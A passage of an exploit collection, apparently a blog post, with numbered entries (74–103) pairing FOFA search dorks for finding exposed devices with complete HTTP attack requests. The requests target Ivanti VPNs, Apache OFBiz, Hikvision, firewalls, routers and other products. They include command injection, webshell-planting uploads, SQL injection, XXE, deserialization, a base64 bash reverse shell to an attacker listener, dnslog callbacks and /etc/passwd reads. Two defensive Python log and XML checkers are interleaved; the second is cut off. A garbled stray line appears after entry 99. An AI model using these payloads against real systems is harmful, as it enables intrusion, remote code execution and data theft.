POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) Palm Campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达天耀) software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
Exploit request below (it plants a Godzilla webshell):
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php

88. DBAppSecurity (安恒) MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request /astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi-Anxin Wangshen SecGate 3600 firewall (奇安信网神) app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file (path spelling as in the POC):
GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
94. Qi-Anxin Wangshen SecGate 3600 firewall (奇安信网神) obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the file uploaded in this request:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA: app="Apache_OFBiz"
The USERNAME/PASSWORD query parameters together with requirePasswordChange=Y bypass the login check; the serializable element is then deserialized by the xmlrpc endpoint.
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD
96. Apache OFBiz 18.12.11 groovy remote code execution (ProgramExport)
FOFA: app="Apache_OFBiz"
Same requirePasswordChange=Y login bypass as entry 95; the groovyProgram parameter is evaluated server-side and the command output is returned inside the exception message.
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on the attacking host (Kali):
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
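Both OFBiz POCs above (95 and 96) ride on the same pre-auth trick: USERNAME/PASSWORD passed in the query string together with requirePasswordChange=Y, which the vulnerable login check accepted as a logged-in state because it only failed on an explicit "error" result. The Python below is an added example, not part of the original post or of OFBiz itself; it parses constructed Tomcat-style access-log lines and flags that pattern against the two endpoints, stripping the ";" path-parameter trick (xmlrpc;/) first so the match is made on the path the container actually dispatches. The log format and sample lines are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in combined-log format (assumption: OFBiz fronted by a server that logs this way);
# the two requests from 10.0.0.5 reproduce the paths used by entries 95 and 96 of this page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2023:10:01:02 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 512
10.0.0.5 - - [12/Dec/2023:10:01:09 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 1843
10.0.0.9 - - [12/Dec/2023:10:02:00 +0000] "GET /webtools/control/main HTTP/1.1" 302 0
10.0.0.9 - - [12/Dec/2023:10:02:05 +0000] "POST /webtools/control/login HTTP/1.1" 200 5120
"""

# Endpoints the two POCs reach once the login check is bypassed (lower-cased for comparison).
SENSITIVE_PATHS = ("/webtools/control/xmlrpc", "/webtools/control/programexport")


def canonical_path(target: str) -> str:
    """Drop ';'-delimited path parameters from every segment and trailing slashes, then lower-case.
    'xmlrpc;/' is what the POC sends; the servlet container dispatches it as 'xmlrpc'."""
    path = urlsplit(target).path
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return "/".join(segments).rstrip("/").lower()


def is_bypass_attempt(target: str) -> bool:
    """True when a sensitive OFBiz endpoint is requested with credentials in the query string and
    requirePasswordChange=Y. In the vulnerable versions the login check only failed on an explicit
    'error' result, so the 'password must be changed' state produced by that flag passed as logged in.
    A normal browser session never sends USERNAME/PASSWORD as query parameters to these endpoints."""
    if not canonical_path(target).startswith(SENSITIVE_PATHS):
        return False
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    flag = query.get("requirePasswordChange", [""])[0].upper()
    return flag == "Y" and ("USERNAME" in query or "PASSWORD" in query)


def parse_log_line(line: str):
    """Return (client_ip, method, target) for one combined-log line, or None if it does not parse."""
    pieces = line.split('"')
    if len(pieces) < 3:
        return None
    request = pieces[1].split(" ")
    if len(request) < 2:
        return None
    return line.split(" ", 1)[0], request[0], request[1]


def find_bypass_attempts(log_text: str):
    """Scan a log and return the (client_ip, method, target) tuples that match the bypass pattern."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_log_line(line)
        if parsed and is_bypass_attempt(parsed[2]):
            hits.append(parsed)
    return hits


if __name__ == "__main__":
    for ip, method, target in find_bypass_attempts(SAMPLE_LOG):
        print(f"{ip} {method} {target}")
```

Run over real logs, the hit list is also a quick inventory of which hosts were probed before patching; the ";" stripping matters because a plain string match on "/webtools/control/xmlrpc?" misses the POC's "xmlrpc;/" form.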

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA: app="SpiderFlow"
The script value closes the generated function body with } and reopens a block with {, so the injected Java call sits outside the function and runs when the script is evaluated.
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
99. Ncast HD intelligent recording system (盈可视高清智能录播系统) busiFacade RCE
CVE-2024-0305
FOFA: app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

Decoded body: {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}
% `. s3 v; w& K9 Z' Y7 H
/ r0 A) j6 Z+ C# x9 J8 s- C
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA: icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--
101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA: body="welcome.cgi?p=logo"
The path traverses from the unauthenticated TOTP endpoint into /license/keys-status/, where the last segment (after the URL-decoded ;) is passed to a shell.
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
102. Ivanti Connect Secure (Pulse Connect Secure) VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA: body="welcome.cgi?p=logo"
The SAML component fetches the URI given in ds:RetrievalMethod; the dnslog host in the POC receives the callback.
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>
103. Ivanti Connect Secure (Pulse Connect Secure) VPN XXE
CVE-2024-22024
FOFA: body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML; the out-of-band request to the dnslog host confirms that the parameter entity was resolved:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
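Entries 102 and 103 both abuse XML handling in the SAML components. The Python below is an added example (not from the original post and not Ivanti code) showing the two checks a gateway or WAF can apply to the page's own payloads without resolving anything: decode the SAMLRequest field and reject it if it carries a DOCTYPE or ENTITY declaration (103), and parse a signature document and list the ds:RetrievalMethod URIs that point off-box (102). The "own hosts" set and the benign AuthnRequest are assumptions; the two malicious bodies are copied from entries 102 and 103 above.

```python
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlsplit

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
# A DOCTYPE or ENTITY declaration has no legitimate use in a SAML message, so its mere presence
# is enough to reject the request without ever handing the bytes to an XML parser.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Entry 103's POST body, copied from this page (the base64 decodes to the parameter-entity probe).
XXE_FORM_BODY = ("SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
                 "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==")

# Constructed benign counterpart: a minimal AuthnRequest, base64-encoded the way a real SP would send it.
BENIGN_FORM_BODY = "SAMLRequest=" + base64.b64encode(
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_c0ffee" Version="2.0"/>'
).decode()

# Entry 102's SOAP body, copied from this page with the extraction-doubled characters repaired.
SSRF_SOAP_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
    '<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    '<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo>'
    '<ds:SignatureValue>qwerty</ds:SignatureValue>'
    '<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
    ' xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    '<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    '<ds:Object></ds:Object></ds:Signature></soap:Body></soap:Envelope>'
)


def form_field(form_body: str, name: str):
    """Pull one field out of an application/x-www-form-urlencoded body.
    unquote rather than unquote_plus: '+' is part of the base64 alphabet in the page's raw POC."""
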